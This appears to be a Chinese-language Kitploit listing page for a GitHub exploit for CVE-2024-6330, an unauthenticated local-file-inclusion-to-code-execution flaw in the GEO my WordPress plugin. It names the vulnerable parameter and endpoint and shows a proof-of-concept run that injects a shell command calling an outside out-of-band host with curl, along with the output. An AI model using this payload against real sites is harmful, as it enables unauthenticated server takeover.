Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-6330 — GEO my WordPress < 4.5.0.2 - 未认证LFI导致RCE/PHAR反序列化 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-6330
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubrandomrobbiebf/cve-2024-6330

CVE-2024-6330

GEO my WordPress < 4.5.0.2 - 未认证LFI导致RCE/PHAR反序列化

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-6330

GEO my WordPress <= 4.5.0.1 - 未经认证的本地文件包含

描述

WordPress 的 GEO my WP 插件在所有版本(包括 4.5.0.1)中存在本地文件包含漏洞,漏洞通过 'form[info_window_template][content_path]' 参数触发。这使得未经认证的攻击者能够在服务器上包含并执行任意文件,从而执行这些文件中的任何 PHP 代码。此漏洞可用于绕过访问控制、获取敏感数据,或者在可以上传并包含图片及其他“安全”文件类型的情况下实现代码执行。

详情

  • 类型: 插件
  • 标识: geo-my-wp
  • 受影响版本: 4.5.0.1
  • CVSS 评分: 9.8
  • CVSS 评级: 严重
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-6330
  • 状态: 活跃

POC

root@kitploit:~
python3 CVE-2024-6330.py --url https://wp-dev.ddev.site --proxy http://127.0.0.1:8080 --execute="curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site"
[*] 开始安全测试...
[*] 初次访问 https://wp-dev.ddev.site: 200

[+] 测试 object_id: 1
[+] URL: https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=gmw_info_window_init&0=echo%20Command%20Output:%20$(curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site)
[+] 状态码: 200
[+] 响应内容:
Command Output: <html><body>ivv900fnzbln0dem43z7zmzjjgigz</body></html>
下载工具